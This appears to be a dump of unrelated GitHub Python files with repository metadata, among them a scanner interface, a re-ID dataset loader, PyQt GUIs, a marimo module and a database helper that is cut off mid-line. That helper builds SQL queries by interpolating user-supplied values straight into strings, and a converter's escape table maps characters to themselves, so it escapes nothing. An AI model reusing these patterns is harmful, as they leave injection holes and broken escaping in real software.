visitor_config[\"kwargs\"].items()]), 63)\n ),\n \"+-----------------------------------------------------------------------------+\",\n ]\n\n self.log.plain(\"\\n\".join(greeting), self.log.clr.INFO)\n\n def run(self):\n self.print_greeting()\n\n start = datetime.datetime.now()\n scanner = Scanner(self.log, **self.scanner_config)\n\n try:\n scanner.scan(self.path)\n except KeyboardInterrupt:\n self.log.info(\"Interrupted, exiting\")\n\n duration = datetime.datetime.now() - start\n self.log.info(\n \"Ran {} rules on {} files: {} findings in {}\".format(\n len(scanner.visitors), scanner.n_files, scanner.n_findings, duration\n )\n )\n","repo_name":"bitstamp-security/astvuln","sub_path":"src/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":9289,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"76"} +{"seq_id":"14767776395","text":"import os.path as osp\nfrom glob import glob\nimport re\n\nclass DataSet(object):\n def __init__(self, data_dir, name='makret', info=True):\n self.name = name\n self.images_dir = osp.join(data_dir, name)\n self.train_path = 'bounding_box_train'\n self.train_camstyle_path = 'bounding_box_train_camstyle'\n self.query_path = 'query'\n self.gallery_path = 'bounding_box_test'\n\n self.train, self.query, self.gallery = [], [], []\n self.num_train_ids, self.num_query_ids, self.num_gallery_ids = 0, 0, 0\n\n self.cam_dict = self.set_cam_dict()\n self.num_cam = self.cam_dict[name]\n\n self.load(info)\n\n def set_cam_dict(self):\n cam_dict = {}\n cam_dict['market'] = 6\n cam_dict['duke'] = 8\n cam_dict['msmt17'] = 15\n return cam_dict\n\n def preprocess(self, images_dir, path, relabel=True):\n pattern = re.compile(r'([-\\d]+)_c([-\\d]+)')\n all_pids = {}\n idx2pid = []\n ret = []\n fpaths = sorted(glob(osp.join(images_dir, path, '*.jpg')))\n cnt = 0\n for fpath in fpaths:\n fname = osp.basename(fpath)\n pid, cam = map(int, pattern.search(fname).groups())\n if pid == -1: continue # junk images are just ignored\n if relabel:\n if pid not in all_pids:\n all_pids[pid] = len(all_pids)\n else:\n if pid not in all_pids:\n all_pids[pid] = pid\n pid = all_pids[pid]\n cam -= 1\n ret.append((fname, pid, cam, cnt))\n idx2pid.append(pid)\n cnt = cnt + 1\n if relabel:\n return ret, int(len(all_pids)), idx2pid\n else:\n return ret, int(len(all_pids))\n\n def load(self, info=True):\n self.train, self.num_train_ids, self.idx2pid = self.preprocess(self.images_dir, self.train_path)\n self.query, self.num_query_ids = self.preprocess(self.images_dir, self.query_path, relabel=False)\n self.gallery, self.num_gallery_ids = self.preprocess(self.images_dir, self.gallery_path, relabel=False)\n\n if info:\n print(self.__class__.__name__, self.name, \"loaded\")\n print(\" subset | # ids | # images\")\n print(\" ---------------------------\")\n print(\" train | 'Unknown' | {:8d}\"\n .format(len(self.train)))\n print(\" query | {:5d} | {:8d}\"\n .format(self.num_query_ids, len(self.query)))\n print(\" gallery | {:5d} | {:8d}\"\n .format(self.num_gallery_ids, len(self.gallery)))","repo_name":"kennethwdk/MLCReID","sub_path":"lib/datasets/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"76"} +{"seq_id":"462525941","text":"\"\"\"no limit on repo varchar columns\n\nRevision ID: f4f4c1b37f93\nRevises: 06af777f16c6\nCreate Date: 2023-06-08 15:22:06.327702\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# Polar Custom Imports\nfrom polar.kit.extensions.sqlalchemy import PostgresUUID\n\n# revision identifiers, used by Alembic.\nrevision = \"f4f4c1b37f93\"\ndown_revision = \"06af777f16c6\"\nbranch_labels: tuple[str] | None = None\ndepends_on: tuple[str] | None = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column(\n \"repositories\",\n \"license\",\n existing_type=sa.VARCHAR(length=50),\n type_=sa.VARCHAR(),\n existing_nullable=True,\n )\n op.alter_column(\n \"repositories\",\n \"homepage\",\n existing_type=sa.VARCHAR(length=128),\n type_=sa.VARCHAR(),\n existing_nullable=True,\n )\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column(\n \"repositories\",\n \"homepage\",\n existing_type=sa.VARCHAR(),\n type_=sa.VARCHAR(length=128),\n existing_nullable=True,\n )\n op.alter_column(\n \"repositories\",\n \"license\",\n existing_type=sa.VARCHAR(),\n type_=sa.VARCHAR(length=50),\n existing_nullable=True,\n )\n # ### end Alembic commands ###\n","repo_name":"polarsource/polar","sub_path":"server/migrations/versions/2023-06-08_no_limit_on_repo_varchar_columns.py","file_name":"2023-06-08_no_limit_on_repo_varchar_columns.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":736,"dataset":"github-code","pt":"76"} +{"seq_id":"37565440462","text":"import math\nfrom typing import Set\n\nnumber = 600851475143\nseen = set()\n\ndef findFactors(num):\n factors = []\n maxNumber = int(math.sqrt(num))\n\n if num in seen:\n return [-1]\n\n for i in range(2, maxNumber):\n if num % i == 0:\n factors.append(i)\n factors.append(int(num / i))\n\n result = []\n\n for fact in factors:\n result.extend(findFactors(fact))\n\n if len(result) == 0:\n result.append(num)\n\n seen.add(num)\n\n return result\n\ndef main():\n factors_list = findFactors(number)\n\n factors_list.sort()\n # print(\"factors: {}\".format(factors_list))\n print(\"max prime factor: {}\".format(max(factors_list)))\n\nmain()\n\n","repo_name":"AndrewVetovitz/Project-Euler","sub_path":"problems/problem3.py","file_name":"problem3.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9544740592","text":"import os\nimport webbrowser\n\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtWidgets import QSystemTrayIcon, QAction, QMenu, qApp, QStyle\n\nimport main_design\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5 import QtWidgets, QtCore\n\n\ndef open_settings_in_editor():\n from sys import platform\n if platform == \"linux\" or platform == \"linux2\":\n osCommandString = 'gedit settings.json'\n os.system(osCommandString)\n elif platform == \"win32\":\n osCommandString = 'notepad.exe settings.json'\n os.system(osCommandString)\n\n\nclass MainApp(QtWidgets.QMainWindow, main_design.Ui_MainWindow):\n def __init__(self, settings_dict, config_sess, pairs_dict):\n super().__init__()\n self.setupUi(self)\n\n self.settings_dict = settings_dict\n self.config_sess = config_sess\n\n to_hide = [\n self.allert_symbol1, self.allert_symbol2, self.allert_symbol3,\n self.allert_symbol3, self.allert_symbol4, self.price_converted1,\n self.volume_converted1, self.high_converted1, self.low_converted1,\n self.price_converted2, self.volume_converted2, self.high_converted2,\n self.low_converted2, self.price_converted3, self.volume_converted3,\n self.high_converted3, self.low_converted3, self.price_converted4,\n self.volume_converted4, self.high_converted4, self.low_converted4\n ]\n\n for el in to_hide:\n el.hide()\n\n orders = [\n self.orders1, self.orders2, self.orders3, self.orders4\n ]\n\n self.toolbar_widget.setVisible(False)\n\n if not settings_dict['window']['orders']:\n for el in orders:\n el.setVisible(False)\n\n if settings_dict['window']['transparent']:\n self.setAttribute(Qt.WA_TranslucentBackground, True)\n\n if settings_dict['window']['pin']:\n self.setWindowFlags(QtCore.Qt.Window | Qt.WindowStaysOnTopHint)\n\n self.resize(self.minimumSize())\n self.setWindowOpacity(settings_dict['window']['opacity'])\n\n self.pair_group1.setTitle(settings_dict['pairs']['box1']['exchange'] + ':')\n self.pair_group2.setTitle(settings_dict['pairs']['box2']['exchange'] + ':')\n\n self.pairs_elements = {\n '0': {\n 'time': self.update_time1,\n 'pair_name': self.pair_name1,\n 'browser_button': self.browser_button1,\n 'price': self.price1, 'price_converted': self.price_converted1,\n 'volume': self.volume1, 'volume_converted': self.volume_converted1,\n 'high': self.high1, 'high_converted': self.high_converted1,\n 'low': self.low1, 'low_converted': self.low_converted1,\n 'buy': self.buy_table1, 'sell': self.sell_table1\n },\n '1': {\n 'time': self.update_time2,\n 'pair_name': self.pair_name2,\n 'browser_button': self.browser_button2,\n 'price': self.price2, 'price_converted': self.price_converted2,\n 'volume': self.volume2, 'volume_converted': self.volume_converted2,\n 'high': self.high2, 'high_converted': self.high_converted2,\n 'low': self.low2, 'low_converted': self.low_converted2,\n 'buy': self.buy_table2, 'sell': self.sell_table2\n },\n '2': {\n 'time': self.update_time3,\n 'pair_name': self.pair_name3,\n 'browser_button': self.browser_button3,\n 'price': self.price3, 'price_converted': self.price_converted3,\n 'volume': self.volume3, 'volume_converted': self.volume_converted3,\n 'high': self.high3, 'high_converted': self.high_converted3,\n 'low': self.low3, 'low_converted': self.low_converted3,\n 'buy': self.buy_table3, 'sell': self.sell_table3\n },\n '3': {\n 'time': self.update_time4,\n 'pair_name': self.pair_name4,\n 'browser_button': self.browser_button4,\n 'price': self.price4, 'price_converted': self.price_converted4,\n 'volume': self.volume4, 'volume_converted': self.volume_converted4,\n 'high': self.high4, 'high_converted': self.high_converted4,\n 'low': self.low4, 'low_converted': self.low_converted4,\n 'buy': self.buy_table4, 'sell': self.sell_table4\n }\n }\n\n self.link1 = None\n self.link2 = None\n self.link3 = None\n self.link4 = None\n\n if pairs_dict[0]['exchange'] == 'KuCoin':\n self.link1 = 'https://www.kucoin.com/trade/' + pairs_dict[0]['pair']\n elif pairs_dict[0]['exchange'] == 'TradeOgre':\n self.link1 = 'https://tradeogre.com/exchange/' + pairs_dict[0]['pair']\n else:\n self.pairs_elements[str(0)]['browser_button'].setDisabled(True)\n\n if pairs_dict[1]['exchange'] == 'KuCoin':\n self.link2 = 'https://www.kucoin.com/trade/' + pairs_dict[1]['pair']\n elif pairs_dict[1]['exchange'] == 'TradeOgre':\n self.link2 = 'https://tradeogre.com/exchange/' + pairs_dict[1]['pair']\n else:\n self.pairs_elements[str(1)]['browser_button'].setDisabled(True)\n\n if pairs_dict[2]['exchange'] == 'KuCoin':\n self.link3 = 'https://www.kucoin.com/trade/' + pairs_dict[2]['pair']\n elif pairs_dict[2]['exchange'] == 'TradeOgre':\n self.link3 = 'https://tradeogre.com/exchange/' + pairs_dict[2]['pair']\n else:\n self.pairs_elements[str(2)]['browser_button'].setDisabled(True)\n\n if pairs_dict[3]['exchange'] == 'KuCoin':\n self.link4 = 'https://www.kucoin.com/trade/' + pairs_dict[3]['pair']\n elif pairs_dict[3]['exchange'] == 'TradeOgre':\n self.link4 = 'https://tradeogre.com/exchange/' + pairs_dict[3]['pair']\n else:\n self.pairs_elements[str(3)]['browser_button'].setDisabled(True)\n\n self.browser_button1.clicked.connect(self.link1_pressed)\n self.browser_button2.clicked.connect(self.link2_pressed)\n self.browser_button3.clicked.connect(self.link3_pressed)\n self.browser_button4.clicked.connect(self.link4_pressed)\n\n self.actionOpen_settings_in_editor.triggered.connect(open_settings_in_editor)\n self.actionReload_app.triggered.connect(self.reload_app)\n\n self.tray_icon = QSystemTrayIcon(self)\n self.tray_icon.setIcon(QIcon(\"gui_icon.png\"))\n\n show_action = QAction(\"Show\", self)\n quit_action = QAction(\"Exit\", self)\n hide_action = QAction(\"Hide\", self)\n show_action.triggered.connect(self.show)\n hide_action.triggered.connect(self.hide)\n quit_action.triggered.connect(qApp.quit)\n tray_menu = QMenu()\n tray_menu.addAction(show_action)\n tray_menu.addAction(hide_action)\n tray_menu.addAction(quit_action)\n self.tray_icon.setContextMenu(tray_menu)\n self.tray_icon.show()\n\n def link1_pressed(self):\n webbrowser.open_new_tab(self.link1)\n\n def link2_pressed(self):\n webbrowser.open_new_tab(self.link2)\n\n def link3_pressed(self):\n webbrowser.open_new_tab(self.link3)\n\n def link4_pressed(self):\n webbrowser.open_new_tab(self.link4)\n\n def reload_app(self):\n self.close()\n\n def closeEvent(self, event):\n if self.settings_dict['window']['tray']:\n event.ignore()\n self.hide()\n\n if self.settings_dict['developer']['first_on_tray']:\n self.tray_icon.showMessage(\n \"CryptoChecker\",\n \"Application was minimized to tray\",\n QSystemTrayIcon.Information,\n 2000\n )\n self.config_sess.config_dict['developer']['first_on_tray'] = False\n self.config_sess.save_to_file()\n","repo_name":"z1qaw/CryptoChecker","sub_path":"main_gui.py","file_name":"main_gui.py","file_ext":"py","file_size_in_byte":7947,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"10833920469","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''\nCreated on 2017年3月30日\n@author: Irony.\"[讽刺]\n@site: alyl.vip, orzorz.vip, irony.coding.me , irony.iask.in , mzone.iask.in\n@email: 892768447@qq.com\n@file: TestFontAwesome\n@description: \n'''\n\n__Author__ = \"By: Irony.\\\"[讽刺]\\nQQ: 892768447\\nEmail: 892768447@qq.com\"\n__Copyright__ = \"Copyright (c) 2017 Irony.\\\"[讽刺]\"\n__Version__ = \"Version 1.0\"\n\nimport glob\nimport os\nimport sys\n\nfrom PyQt5.QtGui import QFontDatabase, QFont\nfrom PyQt5.QtWidgets import QApplication, QLabel, QWidget, QGridLayout,\\\n QScrollArea\n\nfrom FontAwesome import FontAwesomes\n\n\nclass ScrollArea(QScrollArea):\n\n def __init__(self):\n super(ScrollArea, self).__init__()\n self.setWindowTitle(\"FontAwesome Fonts\")\n self.resize(800, 600)\n self.window = QWidget(self)\n self.setWidget(self.window)\n\n layout = QGridLayout(self.window)\n fonts = list(FontAwesomes.alls().items()) # 786个 131*6\n print(fonts)\n\n for row in range(131):\n for col in range(6):\n # print(row, col, row * 6 + col)\n layout.addWidget(QLabel(\": \".join(fonts[row * 6 + col]),\n self.window,\n font=QFont(\"FontAwesome\", 14)),\n row, col, 1, 1)\n\n def resizeEvent(self, event):\n super(ScrollArea, self).resizeEvent(event)\n self.window.resize(self.width(), self.height() * 4)\n\napp = QApplication(sys.argv)\n\nQFontDatabase.addApplicationFont(\"Fonts/FontAwesome/fontawesome-webfont.ttf\")\n\nwindow = ScrollArea()\n\nwindow.show()\nsys.exit(app.exec_())\n","repo_name":"weih1121/PyQT5Examples","sub_path":"字体测试/TestFontAwesome.py","file_name":"TestFontAwesome.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"76"} +{"seq_id":"26119218705","text":"from odoo import fields, api, tools, models, _\n\n\nclass PurchaseOrderInherit(models.Model):\n _inherit = \"purchase.order.line\"\n\n partner = fields.Char(string=\"Partner\")\n\n @api.onchange('product_id')\n def check_partner(self):\n for purchase in self:\n self.partner = purchase.partner_id.name\n\n product_obj = self.env[\"product.product\"].search([])\n res = {}\n for product in product_obj:\n if product.seller_ids.name.name == self.partner:\n domain = {'product_id': [(product.seller_ids.name.name, '=', self.partner)]}\n return {'domain': domain}\n return res\n\n","repo_name":"planetodooofficial/daywey_custom_module","sub_path":"daywey_custom_module/models/vendor_filter.py","file_name":"vendor_filter.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8520060405","text":"#!/usr/bin/python\n\n__author__ = 'bingli'\n\nimport csv\nimport os\nimport sys\nimport time\n\nnew_dir = 'converterLog'\ntags1 = ['summary', 'preconditions']\ntags2 = ['Regression', 'Smoke', 'Jira No.', 'Automated Test']\ntags3 = ['step_number', 'actions', 'expectedresults']\nspace = ' '\nspecial_char = {'<': '<', '>': '>', '&': '&', '\"': '"', \"'\": '''}\n\n\ndef pre_check(e):\n for k, v in special_char.items():\n e = e.replace(k, v)\n return e\n\n\ndef read_from_csv():\n csv_data = csv.reader(open(csvFile, 'rU')) # Open csv file\n ret_list = []\n invalid_list = []\n\n # Read from csv and append each valid line in to tem_list.\n for index, row in enumerate(csv_data):\n # If name > 100 char, then append the (line number, testcase, length) into invalid_list.\n if len(row[2]) > 100:\n invalid_list.append((index, row[2], len(row[2])))\n continue\n\n # If the row doesn't contain a test case name then this row is just a 'step' of the last test case.\n if row[2] == '':\n ret_list[-1].extend(row[-3:])\n\n # Otherwise, append the row into tem_list.\n else:\n ret_list.append(row)\n\n # If invalid_list not null, then write (line number, test case name, length) into a log file.\n if len(invalid_list) > 0:\n log_name = 'logFile_%s.txt' % time.time()\n curr_dir = os.path.dirname(os.path.abspath(__file__))\n dest_dir = os.path.join(curr_dir, new_dir)\n\n try:\n os.makedirs(dest_dir)\n except OSError:\n pass\n log_file = os.path.join(dest_dir, log_name)\n\n with open(log_file, 'w') as f:\n for item in invalid_list:\n f.write(','.join(str(i) for i in item) + '\\n')\n return ret_list\n\n\ndef write_to_xml():\n xmlData = open(xmlFile, 'w')\n xmlData.write('' + '\\n')\n xmlData.write('' + '\\n')\n\n data = read_from_csv()\n\n # Read from the second row.\n for row in data[1:]:\n xmlData.write('' + '\\n') # ... \n for i in tags1: # ['summary', 'preconditions']\n elem = pre_check(row.pop(2))\n elem_list = elem.split('\\n')\n xmlData.write(space + '<' + i + '>' + '' + k + '

    ' + '\\n')\n xmlData.write(space + ']]>' + '' + '\\n')\n\n num = 2\n xmlData.write(space + '' + '\\n')\n for i in tags2: # ['Regression', 'Smoke', 'Jira No.', 'Automated Test']\n xmlData.write(space*num + '' + '\\n')\n xmlData.write(space*num + '' + '' + '' + '\\n')\n xmlData.write(space*num + '' + '' + '' + '\\n')\n xmlData.write(space*num + '' + '\\n')\n xmlData.write(space + '' + '\\n')\n\n xmlData.write(space + '' + '\\n')\n for k in xrange(len(row)/3):\n xmlData.write(space*num + '' + '\\n')\n for i in tags3: # ['step_number', 'actions', 'expectedresults']\n xmlData.write(space*num + '<' + i + '>' + '' + '' + '\\n')\n xmlData.write(space*num + '' + '\\n')\n xmlData.write(space + '' + '\\n')\n xmlData.write('
    ' + '\\n')\n\n xmlData.write('
    ' + '\\n')\n xmlData.close()\n\nif __name__ == '__main__':\n if len(sys.argv) == 3:\n csvFile = sys.argv[1] # 'OTC-8.csv', read from csv file\n xmlFile = sys.argv[2] # 'OTC-8.xml', output xml file\n else:\n csvFile = sys.argv[1] # take second argument\n xmlFile = csvFile.replace('csv', 'xml') # replace extension\n write_to_xml()","repo_name":"bingli88/TestLink_API_Python","sub_path":"csvConverter.py","file_name":"csvConverter.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72922182324","text":"# 문제 링크: https://leetcode.com/problems/construct-string-from-binary-tree/\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def tree2str(self, root: Optional[TreeNode]) -> str:\n if not root:\n return ''\n\n tree_str = str(root.val)\n if root.left:\n tree_str += '(' + self.tree2str(root.left) + ')'\n if root.right:\n if not root.left:\n tree_str += '()'\n tree_str += '(' + self.tree2str(root.right) + ')'\n\n return tree_str\n","repo_name":"jamesujeon/coding-problem-solutions","sub_path":"leetcode/python 3/606.py","file_name":"606.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"4083707105","text":"from __future__ import annotations\nfrom dataclasses import dataclass, fields\n\nimport marimo as mo\nfrom gfosd import components as gfc\n\n\n@dataclass\nclass Components:\n UNIFORMLY_SMALL: str = \"Small, Uniformly\"\n SPARSE_SMALL: str = \"Small, Sparse\"\n ASYMMETRIC_SMALL: str = \"Small, Asymmetrically\"\n SMOOTH: str = \"Smooth\"\n PERIODIC: str = \"Periodic\"\n PIECEWISE_CONSTANT: str = \"Piecewise Constant\"\n TREND_LINE: str = \"Trend-line\"\n AGGREGATE: str = \"Aggregate\"\n AVERAGE_EQUAL: str = \"Average Equal\"\n CONSTANT: str = \"Constant\"\n FIRST_VALUE_FIXED: str = \"First Value Fixed\"\n\n\n@dataclass\nclass ResidualComponents:\n UNIFORMLY_SMALL: str = Components.UNIFORMLY_SMALL\n SPARSE_SMALL: str = Components.SPARSE_SMALL\n ASYMMETRIC_SMALL: str = Components.ASYMMETRIC_SMALL\n\n\ndef _sorted(collection) -> list:\n return list(sorted(collection))\n\n\nRESIDUAL_COMPONENTS = _sorted([e.default for e in fields(ResidualComponents)])\nCOMPONENT_LIBRARY = _sorted([e.default for e in fields(Components)])\n\n\n@dataclass\nclass Parameters:\n PERIOD: str = \"period\"\n WEIGHT: str = \"weight\"\n THRESHOLD: str = \"threshold\"\n COMPONENTS: str = \"components\"\n FIRST_VALUE: str = \"first value\"\n AVERAGE: str = \"average\"\n CHILDREN: str = \"children\"\n\n\nPARAMETER_UNIVERSE = {\n Parameters.PERIOD: [Components.PERIODIC],\n Parameters.WEIGHT: [\n Components.SMOOTH,\n Components.PIECEWISE_CONSTANT,\n ],\n Parameters.THRESHOLD: [ResidualComponents.ASYMMETRIC_SMALL],\n Parameters.COMPONENTS: [Components.AGGREGATE],\n Parameters.FIRST_VALUE: [Components.FIRST_VALUE_FIXED],\n Parameters.AVERAGE: [Components.AVERAGE_EQUAL],\n}\n\nPARAMETER_DEFAULTS = {\n Parameters.PERIOD: [182, lambda v: mo.ui.slider(1, 365, step=1, value=v)],\n Parameters.WEIGHT: [0, lambda v: mo.ui.slider(-3, 3, value=v)],\n Parameters.THRESHOLD: [\n 0.5,\n lambda v: mo.ui.slider(0, 1, step=0.05, value=v),\n ],\n Parameters.COMPONENTS: [2, lambda v: mo.ui.number(1, 5, step=1, value=v)],\n Parameters.FIRST_VALUE: [\n 0,\n lambda v: mo.ui.number(-100, 100, step=1, value=v),\n ],\n Parameters.AVERAGE: [\n 0,\n lambda v: mo.ui.number(-100, 100, step=1, value=v),\n ],\n}\n\n\ndef parameter_controls(\n component: Components | ResidualComponents, default_values\n) -> mo.ui.dictionary:\n params = {}\n for param in PARAMETER_UNIVERSE:\n if component in PARAMETER_UNIVERSE[param]:\n v, ctor = PARAMETER_DEFAULTS[param]\n try:\n v = default_values[param]\n except KeyError:\n pass\n params[param] = ctor(v)\n return mo.ui.dictionary(params, label=f\"{component}\")\n\n\ndef construct_component(name, parameters, center_periodic=False):\n if name == Components.UNIFORMLY_SMALL:\n return gfc.SumSquare(weight=1)\n elif name == Components.SPARSE_SMALL:\n return gfc.SumAbs(weight=1)\n elif name == Components.ASYMMETRIC_SMALL:\n return gfc.SumQuantile(weight=1, tau=parameters[Parameters.THRESHOLD])\n elif name == Components.SMOOTH:\n return gfc.SumSquare(\n diff=2, weight=10 ** parameters[Parameters.WEIGHT]\n )\n elif name == Components.PIECEWISE_CONSTANT:\n return gfc.SumAbs(diff=1, weight=10 ** parameters[Parameters.WEIGHT])\n elif name == Components.CONSTANT:\n return gfc.NoSlope()\n elif name == Components.PERIODIC:\n if center_periodic:\n return gfc.Aggregate(\n [\n gfc.Periodic(period=parameters[Parameters.PERIOD]),\n gfc.AverageEqual(0),\n ]\n )\n else:\n return gfc.Periodic(period=parameters[Parameters.PERIOD])\n elif name == Components.FIRST_VALUE_FIXED:\n return gfc.FirstValEqual(parameters[Parameters.FIRST_VALUE])\n elif name == Components.AVERAGE_EQUAL:\n return gfc.AverageEqual(parameters[Parameters.AVERAGE])\n elif name == Components.TREND_LINE:\n return gfc.NoCurvature()\n elif name == Components.AGGREGATE:\n components = [\n construct_component(name, params)\n for name, params in parameters[Parameters.CHILDREN]\n ]\n if components:\n return gfc.Aggregate(components)\n else:\n return None\n elif name is None:\n return None\n else:\n raise ValueError(\"Unknown component \", name)\n","repo_name":"marimo-team/marimo","sub_path":"examples/optimization/signals/modules/components.py","file_name":"components.py","file_ext":"py","file_size_in_byte":4427,"program_lang":"python","lang":"en","doc_type":"code","stars":521,"dataset":"github-code","pt":"76"} +{"seq_id":"22522591790","text":"from flask import Flask, render_template, request\nfrom random import randint\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef index() -> None:\n return render_template(\"index.html\")\n\n\n@app.route(\"/rolld\", methods=[\"GET\"])\ndef roll(num, dice) -> None:\n count = 0\n result = 0\n while count < num:\n result += randint(1, dice)\n count += 1\n score = str(result)\n num_string = str(num)\n dice_string = str(dice)\n score_string = str(score)\n f = open(\"scores.txt\", \"a\")\n f.write(f\"\\n{num_string}d{dice_string} => {score_string}\\n\")\n f.close()\n return render_template(\"roll.html\", num_string=num_string, dice_string=dice_string, score_string=score_string)\n\n\nif __name__ == \"__main__\":\n app.run(port=8080)","repo_name":"sammi-turner/Python-Examples","sub_path":"flask_dice_roller/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9071609939","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Feb 6 15:22:27 2017\r\n\r\n@author: mechd\r\n\"\"\"\r\n\r\ndef OSWPI(Mf1, rhof1, Tf1, gamma, R, delta, n, tol):\r\n# OSWPI(1.5, 1.273, 300, 1.4, 286.9, 0.161443, 1000000, 1e-3)\r\n# OSWPI(2.75, 0.123, 114.317, 1.4, 287, 0.135263, 10000000, 1e-3)\r\n import numpy as np\r\n import matplotlib.pyplot as plt\r\n for i in range(n):\r\n sigma = i*np.pi/n\r\n Pf1 = rhof1*R*Tf1\r\n Mfn1 = Mf1*np.sin(sigma)\r\n Pf2 = Pf1*(2*gamma*Mfn1**2/(gamma+1) - ((gamma-1)/(gamma+1)))\r\n Tf2 = Tf1*((1 + 0.5*(gamma-1)*Mfn1**2)*(2*gamma*Mfn1**2/(gamma-1) - 1)*2*(gamma-1)/((gamma+1)**2*Mfn1**2))\r\n rhof2 = rhof1*(Pf2*Tf1)/(Pf1*Tf2)\r\n vfn1 = Mfn1*np.sqrt(gamma*R*Tf1)\r\n vfn2 = vfn1*rhof1/rhof2\r\n vf1 = vfn1/np.sin(sigma)\r\n vf2 = vfn2/np.sin(sigma-delta)\r\n vft1 = vf1*np.cos(sigma)\r\n vft2 = vf2*np.cos(sigma-delta)\r\n Mfn2 = vfn2/np.sqrt(gamma*R*Tf2)\r\n Mf2 = Mfn2/np.sin(sigma-delta)\r\n Mft1 = Mf1*np.cos(sigma)\r\n Mft2 = Mf2*np.cos(sigma-delta)\r\n PT1 = Pf1/(gamma-1) + 0.5*vf1**2/rhof1\r\n PT2 = Pf2/(gamma-1) + 0.5*vf2**2/rhof2\r\n if abs(vft1-vft2) <= tol and Pf2 > Pf1:\r\n# return Pf1, Mfn1, Pf2, Tf2, rhof2, vfn1, vfn2, \r\n# vf1, vf2, vft1, vft2, sigma, Mfn2, Mf2, Mft1, Mft2, PT1, PT2\r\n print('Pf1=', Pf1, '\\nvf1=', vf1, '\\nPf2=', Pf2, '\\nTf2=', \r\n Tf2,'\\nrhof1=', rhof1, '\\nrhof2=', rhof2, '\\nrhof1inv=', \r\n 1/rhof1, '\\nrhof2inv=', 1/rhof2, '\\nvf2=', vf2, '\\nMf2=', Mf2)\r\n print('vfn1=', vfn1, '\\nvfn2=', vfn2, '\\nMfn2=', Mfn2, '\\nvft1=', \r\n vft1, '\\nvft2=', vft2, '\\nMft2=', Mft2, '\\nMft1=', \r\n Mft1, '\\nPT1=', PT1, '\\nPT2=', PT2, '\\nsigma=', sigma,\r\n '\\nsigma_degrees=', 180*sigma/np.pi, '\\npi_sigma=', np.pi/sigma)\r\n print('-------------------------------------------------------')\r\n\r\n return\r\n\r\n","repo_name":"kalagotla/python-scripts","sub_path":"OSWPI.py","file_name":"OSWPI.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"31890255856","text":"from mySecrets import connectStr\nimport json\nimport pyodbc\n\nDATABASE_USERACCOUNTS = \"[dbo].[UserAccounts]\"\nDATABASE_PROBLEMS = \"[dbo].[Problems]\"\nDATABASE_SUBMISSIONS = \"[dbo].[Submissions]\"\n\n\ndef executeCommandCommit(cmd: str) -> None:\n cnxn = pyodbc.connect(connectStr)\n cursor = cnxn.cursor()\n cursor.execute(cmd)\n cursor.commit()\n cnxn.close()\n\n\ndef executeCommandFetchAll(cmd: str) -> list:\n cnxn = pyodbc.connect(connectStr)\n cursor = cnxn.cursor()\n cursor.execute(cmd)\n arr = cursor.fetchall()\n cnxn.close()\n return arr\n\n\ndef ACCOUNT_getUniqueIDNumber() -> int:\n return executeCommandFetchAll(f\"SELECT MAX(AccountID) FROM {DATABASE_USERACCOUNTS}\")[0][0] + 1\n\n\ndef ACCOUNT_createAccount(firstName: str, lastName: str) -> None:\n id = ACCOUNT_getUniqueIDNumber()\n\n executeCommandCommit(f\"INSERT INTO {DATABASE_USERACCOUNTS} VALUES ({id}, '{firstName}', '{lastName}')\")\n\n\ndef PROBLEMS_getProblemsListString() -> list:\n arr = executeCommandFetchAll(f\"SELECT ProblemID, ProblemName, Difficulty FROM {DATABASE_PROBLEMS}\")\n\n for i in range(len(arr)):\n arr[i][0] = str(arr[i][0])\n arr[i][2] = str(arr[i][2])\n return arr\n\n\ndef PROBLEMS_getProblemString(problemID: int) -> list:\n arr = executeCommandFetchAll(f\"SELECT ProblemID, ProblemName, ProblemDescription, ProblemInput, ProblemOutput, ProblemExampleInput, ProblemExampleOutput, TimeLimit, MemoryLimit, Difficulty FROM {DATABASE_PROBLEMS} WHERE ProblemID={str(problemID)}\")\n\n for i in range(len(arr)):\n arr[i][0] = str(arr[i][0])\n arr[i][7] = str(arr[i][7])\n arr[i][8] = str(arr[i][8])\n arr[i][9] = str(arr[i][9])\n for k in range(len(arr[i])):\n arr[i][k] = arr[i][k].replace(\"\\\\n\", \"\\n\")\n\n return arr\n\n\ndef PROBLEMS_getProblemNameString(problemID: int) -> list:\n arr = executeCommandFetchAll(f\"SELECT ProblemID, ProblemName FROM {DATABASE_PROBLEMS} 